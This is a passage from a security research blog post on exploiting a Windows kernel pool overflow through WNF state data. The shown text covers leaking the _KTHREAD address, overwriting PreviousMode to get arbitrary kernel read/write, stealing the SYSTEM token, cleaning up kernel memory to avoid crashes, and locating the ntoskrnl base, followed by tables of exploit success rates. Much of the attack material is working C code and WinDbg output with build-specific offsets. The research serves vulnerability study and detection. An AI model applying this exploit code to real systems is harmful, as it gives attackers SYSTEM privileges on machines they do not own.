From this we can calculate the base address of the _KTHREAD using the offset of 0x2F8 i.e. the ThreadListEntry offset.

0xffffd18606a54378 - 0x2F8 = 0xffffd18606a54080

We can check this is correct (and see we hit our breakpoint in the previous article):

0: kd> !thread 0xffffd18606a54080
THREAD ffffd18606a54080  Cid 1da0.1da4  Teb: 000000ce177e0000 Win32Thread: 0000000000000000 RUNNING on processor 0
IRP List:
    ffffd18608002050: (0006,0430) Flags: 00060004  Mdl: 00000000
Not impersonating
DeviceMap                 ffffba0cc30c6630
Owning Process            ffffd186087b1300       Image:         amberzebra.exe
Attached Process          N/A            Image:         N/A
Wait Start TickCount      2344           Ticks: 1 (0:00:00:00.015)
Context Switch Count      149            IdealProcessor: 1             
UserTime                  00:00:00.000
KernelTime                00:00:00.015
Win32 Start Address 0x00007ff6da2c305c
Stack Init ffffd0096cdc6c90 Current ffffd0096cdc6530
Base ffffd0096cdc7000 Limit ffffd0096cdc1000 Call 0000000000000000
Priority 8 BasePriority 8 PriorityDecrement 0 IoPriority 2 PagePriority 5
Child-SP          RetAddr           : Args to Child                                                           : Call Site
ffffd009`6cdc62a8 fffff805`5a99bc7a : 00000000`00000000 00000000`000000d0 00000000`00000000 ffffba0c`00000000 : Ntfs!NtfsQueryEaUserEaList
ffffd009`6cdc62b0 fffff805`5a9fc8a6 : ffffd009`6cdc6560 ffffd186`08002050 ffffd186`08002300 ffffd186`06a54000 : Ntfs!NtfsCommonQueryEa+0x22a
ffffd009`6cdc6410 fffff805`5a9fc600 : ffffd009`6cdc6560 ffffd186`08002050 ffffd186`08002050 ffffd009`6cdc7000 : Ntfs!NtfsFsdDispatchSwitch+0x286
ffffd009`6cdc6540 fffff805`570d1f35 : ffffd009`6cdc68b0 fffff805`54704b46 ffffd009`6cdc7000 ffffd009`6cdc1000 : Ntfs!NtfsFsdDispatchWait+0x40
ffffd009`6cdc67e0 fffff805`54706ccf : ffffd186`02802940 ffffd186`00000030 00000000`00000000 00000000`00000000 : nt!IofCallDriver+0x55
ffffd009`6cdc6820 fffff805`547048d3 : ffffd009`6cdc68b0 00000000`00000000 00000000`00000001 ffffd186`03074bc0 : FLTMGR!FltpLegacyProcessingAfterPreCallbacksCompleted+0x28f
ffffd009`6cdc6890 fffff805`570d1f35 : ffffd186`08002050 00000000`000000c0 00000000`000000c8 00000000`000000a4 : FLTMGR!FltpDispatch+0xa3
ffffd009`6cdc68f0 fffff805`574a6fb8 : ffffd186`08002050 00000000`00000000 00000000`00000000 fffff805`577b2094 : nt!IofCallDriver+0x55
ffffd009`6cdc6930 fffff805`57455834 : 000000ce`00000000 ffffd009`6cdc6b80 ffffd186`084eb7b0 ffffd009`6cdc6b80 : nt!IopSynchronousServiceTail+0x1a8
ffffd009`6cdc69d0 fffff805`572058b5 : ffffd186`06a54080 000000ce`178fdae8 000000ce`178feba0 00000000`000000a3 : nt!NtQueryEaFile+0x484
ffffd009`6cdc6a90 00007fff`0bfae654 : 00007ff6`da2c14dd 00007ff6`da2c4490 00000000`000000a3 000000ce`178fbee8 : nt!KiSystemServiceCopyEnd+0x25 (TrapFrame @ ffffd009`6cdc6b00)
000000ce`178fdac8 00007ff6`da2c14dd : 00007ff6`da2c4490 00000000`000000a3 000000ce`178fbee8 0000026e`edf509ba : ntdll!NtQueryEaFile+0x14
000000ce`178fdad0 00007ff6`da2c4490 : 00000000`000000a3 000000ce`178fbee8 0000026e`edf509ba 00000000`00000000 : 0x00007ff6`da2c14dd
000000ce`178fdad8 00000000`000000a3 : 000000ce`178fbee8 0000026e`edf509ba 00000000`00000000 000000ce`178fdba0 : 0x00007ff6`da2c4490
000000ce`178fdae0 000000ce`178fbee8 : 0000026e`edf509ba 00000000`00000000 000000ce`178fdba0 000000ce`00000017 : 0xa3
000000ce`178fdae8 0000026e`edf509ba : 00000000`00000000 000000ce`178fdba0 000000ce`00000017 00000000`00000000 : 0x000000ce`178fbee8
000000ce`178fdaf0 00000000`00000000 : 000000ce`178fdba0 000000ce`00000017 00000000`00000000 0000026e`00000001 : 0x0000026e`edf509ba

So we now know how to calculate the address of the `_KTHREAD` kernel data structure which is associated with our running exploit thread. 


At the end of stage 2 we have the following memory layout:

Stage 3 – Abusing PreviousMode

Once we have set the StateData pointer of the _WNF_NAME_INSTANCE to just before the _KPROCESS ThreadListHead Flink, we can leak the Flink value by confusing it with the DataSize and the ChangeTimestamp fields; after querying the object we can then calculate it as FLINK = ((uintptr_t)ChangeTimestamp << 32) | DataSize.

This allows us to calculate the _KTHREAD address using FLINK - 0x2f8.
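
As a short sketch of that calculation, SetStateDataPointer() and QueryTargetStateData() below are hypothetical wrappers around the relative write and NtQueryWnfStateData respectively, and the offsets are those of the build under test (they will differ on other versions):

// Sketch: leak the ThreadListHead Flink through the repointed StateData and
// derive the _KTHREAD base address. Helper functions are hypothetical wrappers
// over the primitives built earlier.
extern void SetStateDataPointer(QWORD KernelAddress);                    // relative write over StateData
extern void QueryTargetStateData(ULONG *DataSize, ULONG *ChangeStamp);   // NtQueryWnfStateData wrapper

#define KPROCESS_THREAD_LIST_HEAD 0x30    // _KPROCESS.ThreadListHead (build specific)
#define KTHREAD_THREAD_LIST_ENTRY 0x2F8   // _KTHREAD.ThreadListEntry (build specific)

QWORD LeakKThreadAddress(QWORD CreatorProcess)
{
    // Point StateData 8 bytes before ThreadListHead so that the Flink value
    // overlays the DataSize (low dword) and ChangeStamp (high dword) fields.
    SetStateDataPointer(CreatorProcess + KPROCESS_THREAD_LIST_HEAD - 0x8);

    ULONG DataSize = 0, ChangeStamp = 0;
    QueryTargetStateData(&DataSize, &ChangeStamp);

    QWORD Flink = ((QWORD)ChangeStamp << 32) | DataSize;
    return Flink - KTHREAD_THREAD_LIST_ENTRY;
}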

Once we have the address of the _KTHREAD, we need to again find a sane value to confuse with the AllocatedSize and DataSize to allow reading and writing of the PreviousMode value at offset 0x232.

In this case, pointing it into here:

   +0x220 Process          : 0xffff900f`56ef0340 _KPROCESS
   +0x228 UserAffinity     : _GROUP_AFFINITY
   +0x228 UserAffinityFill : [10]  "???"

Gives the following "sane" values:

dt _WNF_STATE_DATA FLINK-0x2f8+0x220

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : 0xffff900f
   +0x008 DataSize         : 3
   +0x00c ChangeStamp      : 0

Allowing the most significant word of the Process pointer shown above to be used as the AllocatedSize and the UserAffinity to act as the DataSize. Incidentally, we can actually influence the value used for DataSize using SetProcessAffinityMask or by launching the process with start /affinity exploit.exe, but for our purposes of being able to read and write PreviousMode this is fine.

Visually this looks as follows after the StateData has been modified:

This gives a 3 byte read (and up to 0xffff900f bytes write if needed – but we only need 3 bytes), in which the PreviousMode is included (i.e. set to 1 before modification):

00 00 01 00 00 00 00 00  00 00 | ..........

Using the most significant word of the pointer, which will always be a kernel mode address, should ensure that this is a sufficient AllocatedSize to enable overwriting PreviousMode.

Post Exploitation

Once we have set PreviousMode to 0, as mentioned above, this now gives an unconstrained read/write across the whole kernel memory space using NtWriteVirtualMemory and NtReadVirtualMemory. This is a very powerful primitive and demonstrates the value of moving from an awkward-to-use arbitrary read/write to a method which enables easier post exploitation and enhanced clean-up options.

It is then trivial to walk the ActiveProcessLinks within the EPROCESS, obtain a pointer to a SYSTEM token and replace the existing token with it, or to perform escalation by overwriting the _SEP_TOKEN_PRIVILEGES of the existing token, using techniques which have long been used by Windows exploits.
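
As an illustrative sketch of the token-swap variant (not the exact exploit code), read64() and write64() below are hypothetical wrappers over NtReadVirtualMemory/NtWriteVirtualMemory, and the _EPROCESS offsets are examples for the tested build that must be verified per version:

// Sketch only: token swap via ActiveProcessLinks. Offsets are build specific
// (example values for Windows 10 20H2) and must be adjusted for other versions.
extern QWORD read64(QWORD KernelAddress);
extern void  write64(QWORD KernelAddress, QWORD Value);

#define EPROCESS_UNIQUE_PROCESS_ID    0x440
#define EPROCESS_ACTIVE_PROCESS_LINKS 0x448
#define EPROCESS_TOKEN                0x4B8

void SwapTokenWithSystem(QWORD CurrentEprocess)
{
    QWORD eprocess = CurrentEprocess;

    // Walk the circular ActiveProcessLinks list until the System process (PID 4) is found.
    do {
        QWORD flink = read64(eprocess + EPROCESS_ACTIVE_PROCESS_LINKS);
        eprocess = flink - EPROCESS_ACTIVE_PROCESS_LINKS;
    } while (read64(eprocess + EPROCESS_UNIQUE_PROCESS_ID) != 4);

    // Overwrite our own token with the SYSTEM process token value.
    write64(CurrentEprocess + EPROCESS_TOKEN, read64(eprocess + EPROCESS_TOKEN));
}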

Kernel Memory Cleanup

OK, so the above is good enough for a proof of concept exploit, but due to the potentially large number of memory writes needing to occur for exploit success, it could leave the kernel in a bad state. Also, when the process terminates, certain memory locations which have been overwritten could trigger a BSOD when that corrupted memory is used.

This part of the exploitation process is often overlooked by proof of concept exploit writers but is often the most challenging for use in real world scenarios (red teams / simulated attacks etc.) where stability and reliability are important. Going through this process also helps understand how these types of attacks can be detected.

This section of the blog describes some improvements which can be made in this area.

PreviousMode Restoration

On the version of Windows tested, if we try to launch a new process as SYSTEM while PreviousMode is still set to 0, then we end up with the following crash:

Access violation - code c0000005 (!!! second chance !!!)
nt!PspLocateInPEManifest+0xa9:
fffff804`502f1bb5 0fba68080d      bts     dword ptr [rax+8],0Dh
0: kd> kv
 # Child-SP          RetAddr           : Args to Child                                                           : Call Site
00 ffff8583`c6259c90 fffff804`502f0689 : 00000195`b24ec500 00000000`00000000 00000000`00000428 00007ff6`00000000 : nt!PspLocateInPEManifest+0xa9
01 ffff8583`c6259d00 fffff804`501f19d0 : 00000000`000022aa ffff8583`c625a350 00000000`00000000 00000000`00000000 : nt!PspSetupUserProcessAddressSpace+0xdd
02 ffff8583`c6259db0 fffff804`5021ca6d : 00000000`00000000 ffff8583`c625a350 00000000`00000000 00000000`00000000 : nt!PspAllocateProcess+0x11a4
03 ffff8583`c625a2d0 fffff804`500058b5 : 00000000`00000002 00000000`00000001 00000000`00000000 00000195`b24ec560 : nt!NtCreateUserProcess+0x6ed
04 ffff8583`c625aa90 00007ffd`b35cd6b4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceCopyEnd+0x25 (TrapFrame @ ffff8583`c625ab00)
05 0000008c`c853e418 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!NtCreateUserProcess+0x14

More research needs to be performed to determine if this is necessary on prior versions or if this was a recently introduced change.

This can be fixed simply by using our NtWriteVirtualMemory-based write primitive to restore the PreviousMode value to 1 before launching the cmd.exe shell.
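
For example, something along the following lines, where write8() is a hypothetical single-byte wrapper over the NtWriteVirtualMemory primitive and 0x232 is the PreviousMode offset referenced earlier:

// Sketch: flip PreviousMode back to UserMode (1) before spawning the SYSTEM shell.
// Note that once this write lands, further NtWriteVirtualMemory calls against
// kernel addresses will fail, so any other kernel clean-up must happen first.
extern void write8(QWORD KernelAddress, UCHAR Value);

#define KTHREAD_PREVIOUS_MODE 0x232   // offset on the tested build

void RestorePreviousMode(QWORD KThread)
{
    write8(KThread + KTHREAD_PREVIOUS_MODE, 1);
}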

StateData Pointer Restoration

The StateData pointer (pointing at a _WNF_STATE_DATA) is freed when the _WNF_NAME_INSTANCE is freed on process termination (incidentally, this is also an arbitrary free). If this is not restored to its original value, we will end up with a crash as follows:

00 ffffdc87`2a708cd8 fffff807`27912082 : ffffdc87`2a708e40 fffff807`2777b1d0 00000000`00000100 00000000`00000000 : nt!DbgBreakPointWithStatus
01 ffffdc87`2a708ce0 fffff807`27911666 : 00000000`00000003 ffffdc87`2a708e40 fffff807`27808e90 00000000`0000013a : nt!KiBugCheckDebugBreak+0x12
02 ffffdc87`2a708d40 fffff807`277f3fa7 : 00000000`00000003 00000000`00000023 00000000`00000012 00000000`00000000 : nt!KeBugCheck2+0x946
03 ffffdc87`2a709450 fffff807`2798d938 : 00000000`0000013a 00000000`00000012 ffffa409`6ba02100 ffffa409`7120a000 : nt!KeBugCheckEx+0x107
04 ffffdc87`2a709490 fffff807`2798d998 : 00000000`00000012 ffffdc87`2a7095a0 ffffa409`6ba02100 fffff807`276df83e : nt!RtlpHeapHandleError+0x40
05 ffffdc87`2a7094d0 fffff807`2798d5c5 : ffffa409`7120a000 ffffa409`6ba02280 ffffa409`6ba02280 00000000`00000001 : nt!RtlpHpHeapHandleError+0x58
06 ffffdc87`2a709500 fffff807`2786667e : ffffa409`71293280 00000000`00000001 00000000`00000000 ffffa409`6f6de600 : nt!RtlpLogHeapFailure+0x45
07 ffffdc87`2a709530 fffff807`276cbc44 : 00000000`00000000 ffffb504`3b1aa7d0 00000000`00000000 ffffb504`00000000 : nt!RtlpHpVsContextFree+0x19954e
08 ffffdc87`2a7095d0 fffff807`27db2019 : 00000000`00052d20 ffffb504`33ea4600 ffffa409`712932a0 01000000`00100000 : nt!ExFreeHeapPool+0x4d4        
09 ffffdc87`2a7096b0 fffff807`27a5856b : ffffb504`00000000 ffffb504`00000000 ffffb504`3b1ab020 ffffb504`00000000 : nt!ExFreePool+0x9
0a ffffdc87`2a7096e0 fffff807`27a58329 : 00000000`00000000 ffffa409`712936d0 ffffa409`712936d0 ffffb504`00000000 : nt!ExpWnfDeleteStateData+0x8b
0b ffffdc87`2a709710 fffff807`27c46003 : ffffffff`ffffffff ffffb504`3b1ab020 ffffb504`3ab0f780 00000000`00000000 : nt!ExpWnfDeleteNameInstance+0x1ed
0c ffffdc87`2a709760 fffff807`27b0553e : 00000000`00000000 ffffdc87`2a709990 00000000`00000000 00000000`00000000 : nt!ExpWnfDeleteProcessContext+0x140a9b
0d ffffdc87`2a7097a0 fffff807`27a9ea7f : ffffa409`7129d080 ffffb504`336506a0 ffffdc87`2a709990 00000000`00000000 : nt!ExWnfExitProcess+0x32
0e ffffdc87`2a7097d0 fffff807`279f4558 : 00000000`c000013a 00000000`00000001 ffffdc87`2a7099e0 00000055`8b6d6000 : nt!PspExitThread+0x5eb
0f ffffdc87`2a7098d0 fffff807`276e6ca7 : 00000000`00000000 00000000`00000000 00000000`00000000 fffff807`276f0ee6 : nt!KiSchedulerApcTerminate+0x38
10 ffffdc87`2a709910 fffff807`277f8440 : 00000000`00000000 ffffdc87`2a7099c0 ffffdc87`2a709b80 ffffffff`00000000 : nt!KiDeliverApc+0x487
11 ffffdc87`2a7099c0 fffff807`2780595f : ffffa409`71293000 00000251`173f2b90 00000000`00000000 00000000`00000000 : nt!KiInitiateUserApc+0x70
12 ffffdc87`2a709b00 00007ff9`18cabe44 : 00007ff9`165d26ee 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceExit+0x9f (TrapFrame @ ffffdc87`2a709b00)
13 00000055`8b8ffb28 00007ff9`165d26ee : 00000000`00000000 00000000`00000000 00000000`00000000 00007ff9`18c5a800 : ntdll!NtWaitForSingleObject+0x14
14 00000055`8b8ffb30 00000000`00000000 : 00000000`00000000 00000000`00000000 00007ff9`18c5a800 00000000`00000000 : 0x00007ff9`165d26ee
```

Although we could restore this using the WNF relative read/write, as we have arbitrary read and write using the APIs, we can implement a function which uses a previously saved ScopeInstance pointer to search for the StateName of our targeted _WNF_NAME_INSTANCE object address.

Visually this looks as follows:

Some example code for this is:

```
/**
* This function returns back the address of a _WNF_NAME_INSTANCE looked up by its internal StateName
* It performs an _RTL_AVL_TREE tree walk against the sorted tree of _WNF_NAME_INSTANCES. 
* The tree root is at _WNF_SCOPE_INSTANCE+0x38 (NameSet)
**/
QWORD* FindStateName(unsigned __int64 StateName)
{
    QWORD* i;
    
    // _WNF_SCOPE_INSTANCE+0x38 (NameSet)
    for (i = (QWORD*)read64((char*)BackupScopeInstance+0x38); ; i = (QWORD*)read64((char*)i + 0x8))
    {

        while (1)
        {
            if (!i)
                return 0;

            // StateName is 0x18 after the TreeLinks FLINK
            QWORD CurrStateName = (QWORD)read64((char*)i + 0x18);

            if (StateName >= CurrStateName)
                break;

            i = (QWORD*)read64(i);
        }
        QWORD CurrStateName = (QWORD)read64((char*)i + 0x18);

        if (StateName <= CurrStateName)
            break; 
    }
    return (QWORD*)((QWORD*)i - 2);
}
```

Once we have obtained our _WNF_NAME_INSTANCE, we can then restore the original StateData pointer.
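A minimal sketch of this restoration is shown below, assuming the StateName of the targeted object and the original StateData pointer were saved off before the corruption (TargetStateName and OriginalStateData are hypothetical variables), and that StateData sits at offset 0x58 of _WNF_NAME_INSTANCE on the build tested.

```
/**
* Restores the saved StateData pointer of the corrupted _WNF_NAME_INSTANCE.
* The 0x58 StateData offset is an assumption for the build under test.
**/
void RestoreStateData(unsigned __int64 TargetStateName, QWORD OriginalStateData)
{
    QWORD* NameInstance = FindStateName(TargetStateName);

    if (NameInstance)
    {
        // +0x058 StateData : Ptr64 _WNF_STATE_DATA
        write64((char*)NameInstance + 0x58, OriginalStateData);
    }
}
```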

RunRef Restoration

The next crash encountered was related to the fact that we may have corrupted the RunRef member of many _WNF_NAME_INSTANCEs in the process of obtaining our unbounded _WNF_STATE_DATA. When ExReleaseRundownProtection is called and an invalid value is present, we will crash as follows:

```
1: kd> kv
 # Child-SP          RetAddr           : Args to Child                                                           : Call Site
00 ffffeb0f`0e9e5bf8 fffff805`2f512082 : ffffeb0f`0e9e5d60 fffff805`2f37b1d0 00000000`00000000 00000000`00000000 : nt!DbgBreakPointWithStatus
01 ffffeb0f`0e9e5c00 fffff805`2f511666 : 00000000`00000003 ffffeb0f`0e9e5d60 fffff805`2f408e90 00000000`0000003b : nt!KiBugCheckDebugBreak+0x12
02 ffffeb0f`0e9e5c60 fffff805`2f3f3fa7 : 00000000`00000103 00000000`00000000 fffff805`2f0e3838 ffffc807`cdb5e5e8 : nt!KeBugCheck2+0x946
03 ffffeb0f`0e9e6370 fffff805`2f405e69 : 00000000`0000003b 00000000`c0000005 fffff805`2f242c32 ffffeb0f`0e9e6cb0 : nt!KeBugCheckEx+0x107
04 ffffeb0f`0e9e63b0 fffff805`2f4052bc : ffffeb0f`0e9e7478 fffff805`2f0e3838 ffffeb0f`0e9e65a0 00000000`00000000 : nt!KiBugCheckDispatch+0x69
05 ffffeb0f`0e9e64f0 fffff805`2f3fcd5f : fffff805`2f405240 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceHandler+0x7c
06 ffffeb0f`0e9e6530 fffff805`2f285027 : ffffeb0f`0e9e6aa0 00000000`00000000 ffffeb0f`0e9e7b00 fffff805`2f40595f : nt!RtlpExecuteHandlerForException+0xf
07 ffffeb0f`0e9e6560 fffff805`2f283ce6 : ffffeb0f`0e9e7478 ffffeb0f`0e9e71b0 ffffeb0f`0e9e7478 ffffa300`da5eb5d8 : nt!RtlDispatchException+0x297
08 ffffeb0f`0e9e6c80 fffff805`2f405fac : ffff521f`0e9e8ad8 ffffeb0f`0e9e7560 00000000`00000000 00000000`00000000 : nt!KiDispatchException+0x186
09 ffffeb0f`0e9e7340 fffff805`2f401ce0 : 00000000`00000000 00000000`00000000 ffffffff`ffffffff ffffa300`daf84000 : nt!KiExceptionDispatch+0x12c
0a ffffeb0f`0e9e7520 fffff805`2f242c32 : ffffc807`ce062a50 fffff805`2f2df0dd ffffc807`ce062400 ffffa300`da5eb5d8 : nt!KiGeneralProtectionFault+0x320 (TrapFrame @ ffffeb0f`0e9e7520)
0b ffffeb0f`0e9e76b0 fffff805`2f2e8664 : 00000000`00000006 ffffa300`d449d8a0 ffffa300`da5eb5d8 ffffa300`db013360 : nt!ExfReleaseRundownProtection+0x32
0c ffffeb0f`0e9e76e0 fffff805`2f658318 : ffffffff`00000000 ffffa300`00000000 ffffc807`ce062a50 ffffa300`00000000 : nt!ExReleaseRundownProtection+0x24
0d ffffeb0f`0e9e7710 fffff805`2f846003 : ffffffff`ffffffff ffffa300`db013360 ffffa300`da5eb5a0 00000000`00000000 : nt!ExpWnfDeleteNameInstance+0x1dc
0e ffffeb0f`0e9e7760 fffff805`2f70553e : 00000000`00000000 ffffeb0f`0e9e7990 00000000`00000000 00000000`00000000 : nt!ExpWnfDeleteProcessContext+0x140a9b
0f ffffeb0f`0e9e77a0 fffff805`2f69ea7f : ffffc807`ce0700c0 ffffa300`d2c506a0 ffffeb0f`0e9e7990 00000000`00000000 : nt!ExWnfExitProcess+0x32
10 ffffeb0f`0e9e77d0 fffff805`2f5f4558 : 00000000`c000013a 00000000`00000001 ffffeb0f`0e9e79e0 000000f1`f98db000 : nt!PspExitThread+0x5eb
11 ffffeb0f`0e9e78d0 fffff805`2f2e6ca7 : 00000000`00000000 00000000`00000000 00000000`00000000 fffff805`2f2f0ee6 : nt!KiSchedulerApcTerminate+0x38
12 ffffeb0f`0e9e7910 fffff805`2f3f8440 : 00000000`00000000 ffffeb0f`0e9e79c0 ffffeb0f`0e9e7b80 ffffffff`00000000 : nt!KiDeliverApc+0x487
13 ffffeb0f`0e9e79c0 fffff805`2f40595f : ffffc807`ce062400 0000020b`04f64b90 00000000`00000000 00000000`00000000 : nt!KiInitiateUserApc+0x70
14 ffffeb0f`0e9e7b00 00007ff9`8314be44 : 00007ff9`80aa26ee 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceExit+0x9f (TrapFrame @ ffffeb0f`0e9e7b00)
15 000000f1`f973f678 00007ff9`80aa26ee : 00000000`00000000 00000000`00000000 00000000`00000000 00007ff9`830fa800 : ntdll!NtWaitForSingleObject+0x14
16 000000f1`f973f680 00000000`00000000 : 00000000`00000000 00000000`00000000 00007ff9`830fa800 00000000`00000000 : 0x00007ff9`80aa26ee
```

To restore these correctly we need to think about how these objects fit together in memory and how to obtain a full list of all _WNF_NAME_INSTANCES which could possibly be corrupt.

Within _EPROCESS we have a member WnfContext which is a pointer to a _WNF_PROCESS_CONTEXT.

This looks as follows:

```
nt!_WNF_PROCESS_CONTEXT
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 Process          : Ptr64 _EPROCESS
   +0x010 WnfProcessesListEntry : _LIST_ENTRY
   +0x020 ImplicitScopeInstances : [3] Ptr64 Void
   +0x038 TemporaryNamesListLock : _WNF_LOCK
   +0x040 TemporaryNamesListHead : _LIST_ENTRY
   +0x050 ProcessSubscriptionListLock : _WNF_LOCK
   +0x058 ProcessSubscriptionListHead : _LIST_ENTRY
   +0x068 DeliveryPendingListLock : _WNF_LOCK
   +0x070 DeliveryPendingListHead : _LIST_ENTRY
   +0x080 NotificationEvent : Ptr64 _KEVENT
```

As you can see there is a member TemporaryNamesListHead, which is the head of a linked list connecting the TemporaryNameListEntry members of each _WNF_NAME_INSTANCE.

Therefore, we can calculate the address of each of the _WNF_NAME_INSTANCES by iterating through the linked list using our arbitrary read primitives.

We can then determine if the Header or RunRef has been corrupted and restore to a sane value which does not cause a BSOD (i.e. 0).

An example of this is:

```
/**
* This function starts from the EPROCESS WnfContext which points at a _WNF_PROCESS_CONTEXT
* The _WNF_PROCESS_CONTEXT contains a TemporaryNamesListHead at 0x40 offset. 
* This linked list is then traversed to locate all _WNF_NAME_INSTANCES and the header and RunRef fixed up.
**/
void FindCorruptedRunRefs(LPVOID wnf_process_context_ptr)
{

    // +0x040 TemporaryNamesListHead : _LIST_ENTRY
    LPVOID first = read64((char*)wnf_process_context_ptr + 0x40);
    LPVOID ptr; 

    for (ptr = read64(read64((char*)wnf_process_context_ptr + 0x40)); ; ptr = read64(ptr))
    {
        if (ptr == first) return;

        // +0x088 TemporaryNameListEntry : _LIST_ENTRY
        QWORD* nameinstance = (QWORD*)ptr - 17;

        QWORD header = (QWORD)read64(nameinstance);
        
        if (header != 0x0000000000A80903)
        {
            // Fix the header up.
            write64(nameinstance, 0x0000000000A80903);
            // Fix the RunRef up.
            write64((char*)nameinstance + 0x8, 0);
        }
    }
}
```

NTOSKRNL Base Address

Whilst this isn’t actually needed by the exploit, I needed to obtain the NTOSKRNL base address to speed up some examination and debugging of the segment heap. With access to the EPROCESS/KPROCESS or ETHREAD/KTHREAD, the NTOSKRNL base address can be obtained from the kernel stack. By putting a newly created thread into a wait state, we can walk the kernel stack of that thread and obtain the return address of a known function. Using this and a fixed offset we can calculate the NTOSKRNL base address. A similar technique was used within KernelForge.

The following output shows the thread whilst in the wait state:

```
0: kd> !thread ffffbc037834b080
THREAD ffffbc037834b080  Cid 1ed8.1f54  Teb: 000000537ff92000 Win32Thread: 0000000000000000 WAIT: (UserRequest) UserMode Non-Alertable
    ffffbc037d7f7a60  SynchronizationEvent
Not impersonating
DeviceMap                 ffff988cca61adf0
Owning Process            ffffbc037d8a4340       Image:         amberzebra.exe
Attached Process          N/A            Image:         N/A
Wait Start TickCount      3234           Ticks: 542 (0:00:00:08.468)
Context Switch Count      4              IdealProcessor: 1             
UserTime                  00:00:00.000
KernelTime                00:00:00.000
Win32 Start Address 0x00007ff6e77b1710
Stack Init ffffd288fe699c90 Current ffffd288fe6996a0
Base ffffd288fe69a000 Limit ffffd288fe694000 Call 0000000000000000
Priority 8 BasePriority 8 PriorityDecrement 0 IoPriority 2 PagePriority 5
Child-SP          RetAddr           : Args to Child                                                           : Call Site
ffffd288`fe6996e0 fffff804`818e4540 : fffff804`7d17d180 00000000`ffffffff ffffd288`fe699860 ffffd288`fe699a20 : nt!KiSwapContext+0x76
ffffd288`fe699820 fffff804`818e3a6f : 00000000`00000000 00000000`00000001 ffffd288`fe6999e0 00000000`00000000 : nt!KiSwapThread+0x500
ffffd288`fe6998d0 fffff804`818e3313 : 00000000`00000000 fffff804`00000000 ffffbc03`7c41d500 ffffbc03`7834b1c0 : nt!KiCommitThreadWait+0x14f
ffffd288`fe699970 fffff804`81cd6261 : ffffbc03`7d7f7a60 00000000`00000006 00000000`00000001 00000000`00000000 : nt!KeWaitForSingleObject+0x233
ffffd288`fe699a60 fffff804`81cd630a : ffffbc03`7834b080 00000000`00000000 00000000`00000000 00000000`00000000 : nt!ObWaitForSingleObject+0x91
ffffd288`fe699ac0 fffff804`81a058b5 : ffffbc03`7834b080 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtWaitForSingleObject+0x6a
ffffd288`fe699b00 00007ffc`c0babe44 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceCopyEnd+0x25 (TrapFrame @ ffffd288`fe699b00)
00000053`003ffc68 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!NtWaitForSingleObject+0x14
```
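A sketch of one way to implement this with the arbitrary read primitive is shown below. The _KTHREAD StackLimit (0x30) and StackBase (0x38) offsets are assumptions for the build tested, and instead of the fixed-offset calculation described above, this variant scans backwards from a leaked kernel code pointer until it finds an 'MZ' header. Note that this can return the base of a different kernel module if the pointer found does not point into ntoskrnl, which is why the fixed-offset approach against a known return address is more precise.

```
/**
* Walks the waiting thread's kernel stack looking for a kernel code pointer
* (e.g. a saved return address) and then scans backwards page by page for the
* PE 'MZ' header. Offsets and address ranges are assumptions for the build tested.
**/
QWORD FindNtoskrnlBase(char* WaitingKThread)
{
    QWORD StackLimit = (QWORD)read64(WaitingKThread + 0x30);  // _KTHREAD.StackLimit
    QWORD StackBase  = (QWORD)read64(WaitingKThread + 0x38);  // _KTHREAD.StackBase

    for (QWORD slot = StackLimit; slot < StackBase; slot += 8)
    {
        QWORD value = (QWORD)read64((char*)slot);

        // Heuristic: kernel code pointers sit well above the stack/pool ranges
        // seen on the systems tested.
        if (value < 0xFFFFF80000000000)
            continue;

        // Scan backwards (up to 64MB) for the start of the image.
        QWORD page = value & ~0xFFFULL;

        for (unsigned int i = 0; i < 0x4000; i++, page -= 0x1000)
        {
            if (((QWORD)read64((char*)page) & 0xFFFF) == 0x5A4D)   // 'MZ'
                return page;
        }
    }

    return 0;
}
```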

Exploit Testing and Statistics

As there are some elements of instability and non-determinism in this exploit, an exploit testing framework was developed to determine its effectiveness across multiple runs, on multiple supported platforms, and with varying exploit parameters. Whilst this lab environment is not fully representative of a long-running operating system, with other third-party drivers installed and a noisier kernel pool, it gives some indication of whether this approach is feasible and also feeds into possible detection mechanisms.

The key variables which can be modified with this exploit are:

  • Spray size
  • Post-exploitation choices

All of these are measured over 100 iterations of the exploit (over 5 runs), with a timeout duration of 15 seconds (i.e. a run is considered stable if a BSOD did not occur within 15 seconds of executing the exploit).

SYSTEM shells – Number of times a SYSTEM shell was launched.

Total LFH Writes – For all 100 runs of the exploit, how many corruptions were triggered.

Avg LFH Writes – Average number of LFH overflows needed to obtain a SYSTEM shell.

Failed after 32 – How many times the exploit failed to overflow an adjacent object of the required target type by reaching the maximum number of overflow attempts. 32 was chosen as a semi-arbitrary value based on empirical testing and the blocks in the BlockBitmap for the LFH being scanned in groups of 32 blocks.

BSODs on exec – Number of times the exploit BSOD’d the box on execution.

Unmapped Read – Number of times the relative read reaches unmapped memory (ExpWnfReadStateData) – included in the BSOD on exec count above.

Spray Size Variation

The following statistics show runs when varying the spray size.

Spray size 3000

| Result | Run 1 | Run 2 | Run 3 | Run 4 | Run 5 | Avg |
|---|---|---|---|---|---|---|
| SYSTEM shells | 85 | 82 | 76 | 75 | 75 | 78 |
| Total LFH writes | 708 | 726 | 707 | 678 | 624 | 688 |
| Avg LFH writes | 8 | 8 | 9 | 9 | 8 | 8 |
| Failed after 32 | 1 | 3 | 2 | 1 | 1 | 2 |
| BSODs on exec | 14 | 15 | 22 | 24 | 24 | 20 |
| Unmapped Read | 4 | 5 | 8 | 6 | 10 | 7 |

Spray size 6000

| Result | Run 1 | Run 2 | Run 3 | Run 4 | Run 5 | Avg |
|---|---|---|---|---|---|---|
| SYSTEM shells | 84 | 80 | 78 | 84 | 79 | 81 |
| Total LFH writes | 674 | 643 | 696 | 762 | 706 | 696 |
| Avg LFH writes | 8 | 8 | 9 | 9 | 8 | 8 |
| Failed after 32 | 2 | 4 | 3 | 3 | 4 | 3 |
